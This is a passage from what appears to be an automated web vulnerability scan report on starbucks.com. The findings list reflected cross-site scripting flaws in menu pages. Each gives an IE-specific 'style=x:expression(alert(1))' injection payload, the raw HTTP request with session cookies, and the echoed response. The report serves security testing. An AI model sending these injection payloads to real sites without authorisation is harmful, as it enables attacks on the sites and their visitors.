Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:12 GMT
Connection: close
Content-Length: 41158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-mixed-nuts?aa5a1"style="x:expression(alert(1))"e5e65ed367b=1"/>
...[SNIP]...

2.259. http://www.starbucks.com/menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3953"style%3d"x%3aexpression(alert(1))"8dd8c6a876f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3953"style="x:expression(alert(1))"8dd8c6a876f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin?b3953"style%3d"x%3aexpression(alert(1))"8dd8c6a876f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:44:39 GMT
Connection: close
Content-Length: 42959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin?b3953"style="x:expression(alert(1))"8dd8c6a876f=1"/>
...[SNIP]...

2.260. http://www.starbucks.com/menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71082"style%3d"x%3aexpression(alert(1))"22e1f1319e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71082"style="x:expression(alert(1))"22e1f1319e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin?71082"style%3d"x%3aexpression(alert(1))"22e1f1319e2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:44:18 GMT
Connection: close
Content-Length: 42422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin?71082"style="x:expression(alert(1))"22e1f1319e2=1"/>
...[SNIP]...

2.261. http://www.starbucks.com/menu/food/hot-breakfast/starbucks-perfect-oatmeal [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/starbucks-perfect-oatmeal

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9099b"style%3d"x%3aexpression(alert(1))"fe560f2ff1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9099b"style="x:expression(alert(1))"fe560f2ff1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/starbucks-perfect-oatmeal?9099b"style%3d"x%3aexpression(alert(1))"fe560f2ff1f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:18 GMT
Connection: close
Content-Length: 41848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/starbucks-perfect-oatmeal?9099b"style="x:expression(alert(1))"fe560f2ff1f=1"/>
...[SNIP]...

2.262. http://www.starbucks.com/menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a962"style%3d"x%3aexpression(alert(1))"b0910c44384 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6a962"style="x:expression(alert(1))"b0910c44384 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich?6a962"style%3d"x%3aexpression(alert(1))"b0910c44384=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:43:52 GMT
Connection: close
Content-Length: 42550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich?6a962"style="x:expression(alert(1))"b0910c44384=1"/>
...[SNIP]...

2.263. http://www.starbucks.com/menu/food/ice-cream/caramel-macchiato-ice-cream [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/caramel-macchiato-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df808"style%3d"x%3aexpression(alert(1))"d48af3670c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as df808"style="x:expression(alert(1))"d48af3670c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/caramel-macchiato-ice-cream?df808"style%3d"x%3aexpression(alert(1))"d48af3670c3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:04:49 GMT
Connection: close
Content-Length: 38909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/caramel-macchiato-ice-cream?df808"style="x:expression(alert(1))"d48af3670c3=1"/>
...[SNIP]...

2.264. http://www.starbucks.com/menu/food/ice-cream/coffee-ice-cream [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/coffee-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4981d"style%3d"x%3aexpression(alert(1))"713a0269255 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4981d"style="x:expression(alert(1))"713a0269255 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/coffee-ice-cream?4981d"style%3d"x%3aexpression(alert(1))"713a0269255=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:05:17 GMT
Connection: close
Content-Length: 38702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/coffee-ice-cream?4981d"style="x:expression(alert(1))"713a0269255=1"/>
...[SNIP]...

2.265. http://www.starbucks.com/menu/food/ice-cream/java-chip-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/java-chip-frappuccino-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9c8a"style%3d"x%3aexpression(alert(1))"a6fb88be708 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9c8a"style="x:expression(alert(1))"a6fb88be708 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/java-chip-frappuccino-ice-cream?f9c8a"style%3d"x%3aexpression(alert(1))"a6fb88be708=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:05:21 GMT
Connection: close
Content-Length: 38920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/java-chip-frappuccino-ice-cream?f9c8a"style="x:expression(alert(1))"a6fb88be708=1"/>
...[SNIP]...

2.266. http://www.starbucks.com/menu/food/ice-cream/mocha-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/mocha-frappuccino-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 257c5"style%3d"x%3aexpression(alert(1))"1c951768a35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 257c5"style="x:expression(alert(1))"1c951768a35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/mocha-frappuccino-ice-cream?257c5"style%3d"x%3aexpression(alert(1))"1c951768a35=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:06:07 GMT
Connection: close
Content-Length: 38836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/mocha-frappuccino-ice-cream?257c5"style="x:expression(alert(1))"1c951768a35=1"/>
...[SNIP]...

2.267. http://www.starbucks.com/menu/food/ice-cream/peppermint-mocha-ice-cream [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/peppermint-mocha-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e9f1"style%3d"x%3aexpression(alert(1))"4d62ee870d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e9f1"style="x:expression(alert(1))"4d62ee870d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/peppermint-mocha-ice-cream?2e9f1"style%3d"x%3aexpression(alert(1))"4d62ee870d0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:06:37 GMT
Connection: close
Content-Length: 38833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/peppermint-mocha-ice-cream?2e9f1"style="x:expression(alert(1))"4d62ee870d0=1"/>
...[SNIP]...

2.268. http://www.starbucks.com/menu/food/ice-cream/signature-hot-chocolate-ice-cream [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/signature-hot-chocolate-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0a4d"style%3d"x%3aexpression(alert(1))"9e96fe99df4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f0a4d"style="x:expression(alert(1))"9e96fe99df4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary